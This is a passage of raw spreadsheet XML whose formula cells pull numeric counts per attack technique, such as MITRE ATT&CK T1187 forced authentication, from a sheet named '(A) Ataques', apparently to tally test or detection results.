        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$BJ35,"")</f>
        <v>0</v>
      </c>
      <c r="M35" s="4">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$BL35,"")</f>
        <v>0</v>
      </c>
      <c r="N35" s="20">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$BM35,"")</f>
        <v>0</v>
      </c>
      <c r="O35" s="532">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",IF($K35=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P35" s="292">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$BN35,"")</f>
        <v>0</v>
      </c>
      <c r="Q35" s="322">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$BP35,"")</f>
        <v>0</v>
      </c>
      <c r="R35" s="4">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$BR35,"")</f>
        <v>0</v>
      </c>
      <c r="S35" s="20">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$BS35,"")</f>
        <v>0</v>
      </c>
      <c r="T35" s="530">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",IF($P35=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U35" s="322">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$BT35,"")</f>
        <v>224</v>
      </c>
      <c r="V35" s="322">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$BV35,"")</f>
        <v>215</v>
      </c>
      <c r="W35" s="4">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$BX35,"")</f>
        <v>2</v>
      </c>
      <c r="X35" s="20">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$BY35,"")</f>
        <v>215</v>
      </c>
      <c r="Y35" s="532">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",IF($U35=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z35" s="288">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!BZ35,"")</f>
        <v>216</v>
      </c>
      <c r="AA35" s="392">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!CB35,"")</f>
        <v>214</v>
      </c>
      <c r="AB35" s="4">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!CD35,"")</f>
        <v>3</v>
      </c>
      <c r="AC35" s="20">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!CE35,"")</f>
        <v>212</v>
      </c>
      <c r="AD35" s="331">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",IF(Z35=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE35" s="322">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$CF35,"")</f>
        <v>440</v>
      </c>
      <c r="AF35" s="322">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$CH35,"")</f>
        <v>429</v>
      </c>
      <c r="AG35" s="4">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$CJ35,"")</f>
        <v>5</v>
      </c>
      <c r="AH35" s="20">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$CK35,"")</f>
        <v>215</v>
      </c>
      <c r="AI35" s="287">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",IF($AE35=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ35" s="292">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$CL35,"")</f>
        <v>0</v>
      </c>
      <c r="AK35" s="322">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$CN35,"")</f>
        <v>0</v>
      </c>
      <c r="AL35" s="4">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$CP35,"")</f>
        <v>0</v>
      </c>
      <c r="AM35" s="20">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$CQ35,"")</f>
        <v>0</v>
      </c>
      <c r="AN35" s="331">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",IF($AJ35=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO35" s="322">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$CR35,"")</f>
        <v>12</v>
      </c>
      <c r="AP35" s="322">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$CT35,"")</f>
        <v>3</v>
      </c>
      <c r="AQ35" s="4">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$CV35,"")</f>
        <v>1</v>
      </c>
      <c r="AR35" s="20">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$CW35,"")</f>
        <v>3</v>
      </c>
      <c r="AS35" s="287">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",IF($AO35=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT35" s="288">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!CX35,"")</f>
        <v>12</v>
      </c>
      <c r="AU35" s="392">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!CZ35,"")</f>
        <v>3</v>
      </c>
      <c r="AV35" s="4">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!DB35,"")</f>
        <v>1</v>
      </c>
      <c r="AW35" s="20">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!DC35,"")</f>
        <v>3</v>
      </c>
      <c r="AX35" s="331">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",IF($AT35=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY35" s="469">
        <f>'(A) Ataques'!LU35+'(A) Ataques'!MA35+'(A) Ataques'!MG35+'(A) Ataques'!MM35+'(A) Ataques'!MS35</f>
        <v>0</v>
      </c>
      <c r="AZ35" s="510">
        <f>'(A) Ataques'!LW35+'(A) Ataques'!MC35+'(A) Ataques'!MI35+'(A) Ataques'!MO35+'(A) Ataques'!MU35</f>
        <v>0</v>
      </c>
      <c r="BA35" s="471">
        <f>'(A) Ataques'!LY35+'(A) Ataques'!ME35+'(A) Ataques'!MK35+'(A) Ataques'!MQ35+'(A) Ataques'!MW35</f>
        <v>0</v>
      </c>
      <c r="BB35" s="471">
        <f>'(A) Ataques'!LQ35</f>
        <v>0</v>
      </c>
      <c r="BC35" s="331">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",IF($AY35=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD35" s="469">
        <f>IF('(A) Ataques'!$AP35&lt;&gt;"NO",'(A) Ataques'!LL35,"")</f>
        <v>429</v>
      </c>
      <c r="BE35" s="510">
        <f>IF('(A) Ataques'!$AP35&lt;&gt;"NO",'(A) Ataques'!LM35,"")</f>
        <v>429</v>
      </c>
      <c r="BF35" s="471">
        <f>IF('(A) Ataques'!$AP35&lt;&gt;"NO",'(A) Ataques'!LN35,"")</f>
        <v>0</v>
      </c>
      <c r="BG35" s="471">
        <f>IF('(A) Ataques'!$AP35&lt;&gt;"NO",'(A) Ataques'!LO35,"")</f>
        <v>4</v>
      </c>
      <c r="BH35" s="471">
        <f>IF('(A) Ataques'!$AP35&lt;&gt;"NO",'(A) Ataques'!LS35,"")</f>
        <v>217</v>
      </c>
      <c r="BI35" s="331">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",IF($BD35=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ35" s="469">
        <f>'(A) Ataques'!OL35+'(A) Ataques'!OR35+'(A) Ataques'!OX35+'(A) Ataques'!PD35+'(A) Ataques'!PJ35</f>
        <v>212</v>
      </c>
      <c r="BK35" s="510">
        <f>'(A) Ataques'!ON35+'(A) Ataques'!OT35+'(A) Ataques'!OZ35+'(A) Ataques'!PF35+'(A) Ataques'!PL35</f>
        <v>212</v>
      </c>
      <c r="BL35" s="471">
        <f>'(A) Ataques'!OP35+'(A) Ataques'!OV35+'(A) Ataques'!PB35+'(A) Ataques'!PH35+'(A) Ataques'!PN35</f>
        <v>1</v>
      </c>
      <c r="BM35" s="495">
        <f>'(A) Ataques'!OH35</f>
        <v>212</v>
      </c>
      <c r="BN35" s="331">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",IF($BJ35=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO35" s="469">
        <f>IF('(A) Ataques'!$AP35&lt;&gt;"NO",'(A) Ataques'!OC35,"")</f>
        <v>212</v>
      </c>
      <c r="BP35" s="510">
        <f>IF('(A) Ataques'!$AP35&lt;&gt;"NO",'(A) Ataques'!OD35,"")</f>
        <v>212</v>
      </c>
      <c r="BQ35" s="471">
        <f>IF('(A) Ataques'!$AP35&lt;&gt;"NO",'(A) Ataques'!OE35,"")</f>
        <v>1</v>
      </c>
      <c r="BR35" s="471">
        <f>IF('(A) Ataques'!$AP35&lt;&gt;"NO",'(A) Ataques'!OF35,"")</f>
        <v>1</v>
      </c>
      <c r="BS35" s="471">
        <f>IF('(A) Ataques'!$AP35&lt;&gt;"NO",'(A) Ataques'!OJ35,"")</f>
        <v>212</v>
      </c>
      <c r="BT35" s="331">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",IF($BO35=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="36" spans="1:72" s="5" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A36" s="79">
        <f t="shared" si="0"/>
        <v>34</v>
      </c>
      <c r="B36" s="4">
        <f>IF('(A) Ataques'!AK36&lt;&gt;"NO",'(A) Ataques'!E36,"")</f>
        <v>30</v>
      </c>
      <c r="C36" s="6" t="str">
        <f>IF('(A) Ataques'!AK36&lt;&gt;"NO",IF('(A) Ataques'!M36="","",'(A) Ataques'!M36),"")</f>
        <v>T1187-Forced_Authentication</v>
      </c>
      <c r="D36" s="4" t="str">
        <f>IF('(A) Ataques'!AK36&lt;&gt;"NO",'(A) Ataques'!F36,"")</f>
        <v>T1187</v>
      </c>
      <c r="E36" s="286">
        <f>IF('(A) Ataques'!AK36&lt;&gt;"NO",'(A) Ataques'!AQ36,"")</f>
        <v>8</v>
      </c>
      <c r="F36" s="288">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!BB36,"")</f>
        <v>0</v>
      </c>
      <c r="G36" s="392">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!BD36,"")</f>
        <v>0</v>
      </c>
      <c r="H36" s="4">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!BF36,"")</f>
        <v>0</v>
      </c>
      <c r="I36" s="20">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!BG36,"")</f>
        <v>0</v>
      </c>
      <c r="J36" s="530">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",IF($F36=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K36" s="322">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$BH36,"")</f>
        <v>0</v>
      </c>
      <c r="L36" s="322">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$BJ36,"")</f>
        <v>0</v>
      </c>
      <c r="M36" s="4">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$BL36,"")</f>
        <v>0</v>
      </c>
      <c r="N36" s="20">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$BM36,"")</f>
        <v>0</v>
      </c>
      <c r="O36" s="532">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",IF($K36=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P36" s="292">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$BN36,"")</f>
        <v>0</v>
      </c>
      <c r="Q36" s="322">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$BP36,"")</f>
        <v>0</v>
      </c>
      <c r="R36" s="4">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$BR36,"")</f>
        <v>0</v>
      </c>
      <c r="S36" s="20">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$BS36,"")</f>
        <v>0</v>
      </c>
      <c r="T36" s="530">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",IF($P36=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U36" s="322">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$BT36,"")</f>
        <v>10</v>
      </c>
      <c r="V36" s="322">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$BV36,"")</f>
        <v>10</v>
      </c>
      <c r="W36" s="4">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$BX36,"")</f>
        <v>5</v>
      </c>
      <c r="X36" s="20">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$BY36,"")</f>
        <v>2</v>
      </c>
      <c r="Y36" s="532">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",IF($U36=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z36" s="288">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!BZ36,"")</f>
        <v>21</v>
      </c>
      <c r="AA36" s="392">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!CB36,"")</f>
        <v>21</v>
      </c>
      <c r="AB36" s="4">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!CD36,"")</f>
        <v>10</v>
      </c>
      <c r="AC36" s="20">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!CE36,"")</f>
        <v>7</v>
      </c>
      <c r="AD36" s="331">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",IF(Z36=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE36" s="322">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$CF36,"")</f>
        <v>31</v>
      </c>
      <c r="AF36" s="322">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$CH36,"")</f>
        <v>31</v>
      </c>
      <c r="AG36" s="4">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$CJ36,"")</f>
        <v>15</v>
      </c>
      <c r="AH36" s="20">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$CK36,"")</f>
        <v>7</v>
      </c>
      <c r="AI36" s="287">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",IF($AE36=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ36" s="292">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$CL36,"")</f>
        <v>0</v>
      </c>
      <c r="AK36" s="322">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$CN36,"")</f>
        <v>0</v>
      </c>
      <c r="AL36" s="4">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$CP36,"")</f>
        <v>0</v>
      </c>
      <c r="AM36" s="20">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$CQ36,"")</f>
        <v>0</v>
      </c>
      <c r="AN36" s="331">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",IF($AJ36=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO36" s="322">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$CR36,"")</f>
        <v>0</v>
      </c>
      <c r="AP36" s="322">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$CT36,"")</f>
        <v>0</v>
      </c>
      <c r="AQ36" s="4">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$CV36,"")</f>
        <v>0</v>
      </c>
      <c r="AR36" s="20">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!$CW36,"")</f>
        <v>0</v>
      </c>
      <c r="AS36" s="287">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",IF($AO36=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT36" s="288">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!CX36,"")</f>
        <v>0</v>
      </c>
      <c r="AU36" s="392">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!CZ36,"")</f>
        <v>0</v>
      </c>
      <c r="AV36" s="4">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!DB36,"")</f>
        <v>0</v>
      </c>
      <c r="AW36" s="20">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",'(A) Ataques'!DC36,"")</f>
        <v>0</v>
      </c>
      <c r="AX36" s="331">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",IF($AT36=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AY36" s="469">
        <f>'(A) Ataques'!LU36+'(A) Ataques'!MA36+'(A) Ataques'!MG36+'(A) Ataques'!MM36+'(A) Ataques'!MS36</f>
        <v>5</v>
      </c>
      <c r="AZ36" s="510">
        <f>'(A) Ataques'!LW36+'(A) Ataques'!MC36+'(A) Ataques'!MI36+'(A) Ataques'!MO36+'(A) Ataques'!MU36</f>
        <v>5</v>
      </c>
      <c r="BA36" s="471">
        <f>'(A) Ataques'!LY36+'(A) Ataques'!ME36+'(A) Ataques'!MK36+'(A) Ataques'!MQ36+'(A) Ataques'!MW36</f>
        <v>1</v>
      </c>
      <c r="BB36" s="471">
        <f>'(A) Ataques'!LQ36</f>
        <v>5</v>
      </c>
      <c r="BC36" s="331">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",IF($AY36=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD36" s="469">
        <f>IF('(A) Ataques'!$AP36&lt;&gt;"NO",'(A) Ataques'!LL36,"")</f>
        <v>22</v>
      </c>
      <c r="BE36" s="510">
        <f>IF('(A) Ataques'!$AP36&lt;&gt;"NO",'(A) Ataques'!LM36,"")</f>
        <v>22</v>
      </c>
      <c r="BF36" s="471">
        <f>IF('(A) Ataques'!$AP36&lt;&gt;"NO",'(A) Ataques'!LN36,"")</f>
        <v>1</v>
      </c>
      <c r="BG36" s="471">
        <f>IF('(A) Ataques'!$AP36&lt;&gt;"NO",'(A) Ataques'!LO36,"")</f>
        <v>4</v>
      </c>
      <c r="BH36" s="471">
        <f>IF('(A) Ataques'!$AP36&lt;&gt;"NO",'(A) Ataques'!LS36,"")</f>
        <v>7</v>
      </c>
      <c r="BI36" s="331">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",IF($BD36=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ36" s="469">
        <f>'(A) Ataques'!OL36+'(A) Ataques'!OR36+'(A) Ataques'!OX36+'(A) Ataques'!PD36+'(A) Ataques'!PJ36</f>
        <v>7</v>
      </c>
      <c r="BK36" s="510">
        <f>'(A) Ataques'!ON36+'(A) Ataques'!OT36+'(A) Ataques'!OZ36+'(A) Ataques'!PF36+'(A) Ataques'!PL36</f>
        <v>7</v>
      </c>
      <c r="BL36" s="471">
        <f>'(A) Ataques'!OP36+'(A) Ataques'!OV36+'(A) Ataques'!PB36+'(A) Ataques'!PH36+'(A) Ataques'!PN36</f>
        <v>2</v>
      </c>
      <c r="BM36" s="495">
        <f>'(A) Ataques'!OH36</f>
        <v>5</v>
      </c>
      <c r="BN36" s="331">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",IF($BJ36=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO36" s="469">
        <f>IF('(A) Ataques'!$AP36&lt;&gt;"NO",'(A) Ataques'!OC36,"")</f>
        <v>7</v>
      </c>
      <c r="BP36" s="510">
        <f>IF('(A) Ataques'!$AP36&lt;&gt;"NO",'(A) Ataques'!OD36,"")</f>
        <v>7</v>
      </c>
      <c r="BQ36" s="471">
        <f>IF('(A) Ataques'!$AP36&lt;&gt;"NO",'(A) Ataques'!OE36,"")</f>
        <v>2</v>
      </c>
      <c r="BR36" s="471">
        <f>IF('(A) Ataques'!$AP36&lt;&gt;"NO",'(A) Ataques'!OF36,"")</f>
        <v>1</v>
      </c>
      <c r="BS36" s="471">
        <f>IF('(A) Ataques'!$AP36&lt;&gt;"NO",'(A) Ataques'!OJ36,"")</f>
        <v>5</v>
      </c>
      <c r="BT36" s="331">
        <f>IF('(A) Ataques'!$AK36&lt;&gt;"NO",IF($BO36=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:72" s="5" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A37" s="79">
        <f t="shared" si="0"/>
        <v>35</v>
      </c>
      <c r="B37" s="4">
        <f>IF('(A) Ataques'!AK37&lt;&gt;"NO",'(A) Ataques'!E37,"")</f>
        <v>30</v>
      </c>
      <c r="C37" s="6" t="str">
        <f>IF('(A) Ataques'!AK37&lt;&gt;"NO",IF('(A) Ataques'!M37="","",'(A) Ataques'!M37),"")</f>
        <v>T1187-Forced_Authentication2</v>
      </c>
      <c r="D37" s="4" t="str">
        <f>IF('(A) Ataques'!AK37&lt;&gt;"NO",'(A) Ataques'!F37,"")</f>
        <v>T1187</v>
      </c>
      <c r="E37" s="286">
        <f>IF('(A) Ataques'!AK37&lt;&gt;"NO",'(A) Ataques'!AQ37,"")</f>
        <v>3</v>
      </c>
      <c r="F37" s="288">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!BB37,"")</f>
        <v>0</v>
      </c>
      <c r="G37" s="392">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!BD37,"")</f>
        <v>0</v>
      </c>
      <c r="H37" s="4">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!BF37,"")</f>
        <v>0</v>
      </c>
      <c r="I37" s="20">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!BG37,"")</f>
        <v>0</v>
      </c>
      <c r="J37" s="530">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",IF($F37=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K37" s="322">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$BH37,"")</f>
        <v>0</v>
      </c>
      <c r="L37" s="322">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$BJ37,"")</f>
        <v>0</v>
      </c>
      <c r="M37" s="4">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$BL37,"")</f>
        <v>0</v>
      </c>
      <c r="N37" s="20">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$BM37,"")</f>
        <v>0</v>
      </c>
      <c r="O37" s="532">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",IF($K37=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P37" s="292">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$BN37,"")</f>
        <v>0</v>
      </c>
      <c r="Q37" s="322">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$BP37,"")</f>
        <v>0</v>
      </c>
      <c r="R37" s="4">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$BR37,"")</f>
        <v>0</v>
      </c>
      <c r="S37" s="20">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$BS37,"")</f>
        <v>0</v>
      </c>
      <c r="T37" s="530">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",IF($P37=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U37" s="322">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$BT37,"")</f>
        <v>5</v>
      </c>
      <c r="V37" s="322">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$BV37,"")</f>
        <v>5</v>
      </c>
      <c r="W37" s="4">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$BX37,"")</f>
        <v>5</v>
      </c>
      <c r="X37" s="20">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$BY37,"")</f>
        <v>1</v>
      </c>
      <c r="Y37" s="532">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",IF($U37=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z37" s="288">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!BZ37,"")</f>
        <v>16</v>
      </c>
      <c r="AA37" s="392">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!CB37,"")</f>
        <v>14</v>
      </c>
      <c r="AB37" s="4">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!CD37,"")</f>
        <v>10</v>
      </c>
      <c r="AC37" s="20">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!CE37,"")</f>
        <v>3</v>
      </c>
      <c r="AD37" s="331">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",IF(Z37=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE37" s="322">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$CF37,"")</f>
        <v>21</v>
      </c>
      <c r="AF37" s="322">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$CH37,"")</f>
        <v>19</v>
      </c>
      <c r="AG37" s="4">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$CJ37,"")</f>
        <v>15</v>
      </c>
      <c r="AH37" s="20">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$CK37,"")</f>
        <v>3</v>
      </c>
      <c r="AI37" s="287">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",IF($AE37=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ37" s="292">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$CL37,"")</f>
        <v>0</v>
      </c>
      <c r="AK37" s="322">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$CN37,"")</f>
        <v>0</v>
      </c>
      <c r="AL37" s="4">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$CP37,"")</f>
        <v>0</v>
      </c>
      <c r="AM37" s="20">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$CQ37,"")</f>
        <v>0</v>
      </c>
      <c r="AN37" s="331">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",IF($AJ37=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO37" s="322">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$CR37,"")</f>
        <v>0</v>
      </c>
      <c r="AP37" s="322">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$CT37,"")</f>
        <v>0</v>
      </c>
      <c r="AQ37" s="4">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$CV37,"")</f>
        <v>0</v>
      </c>
      <c r="AR37" s="20">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!$CW37,"")</f>
        <v>0</v>
      </c>
      <c r="AS37" s="287">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",IF($AO37=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT37" s="288">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!CX37,"")</f>
        <v>0</v>
      </c>
      <c r="AU37" s="392">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!CZ37,"")</f>
        <v>0</v>
      </c>
      <c r="AV37" s="4">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!DB37,"")</f>
        <v>0</v>
      </c>
      <c r="AW37" s="20">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",'(A) Ataques'!DC37,"")</f>
        <v>0</v>
      </c>
      <c r="AX37" s="331">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",IF($AT37=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AY37" s="469">
        <f>'(A) Ataques'!LU37+'(A) Ataques'!MA37+'(A) Ataques'!MG37+'(A) Ataques'!MM37+'(A) Ataques'!MS37</f>
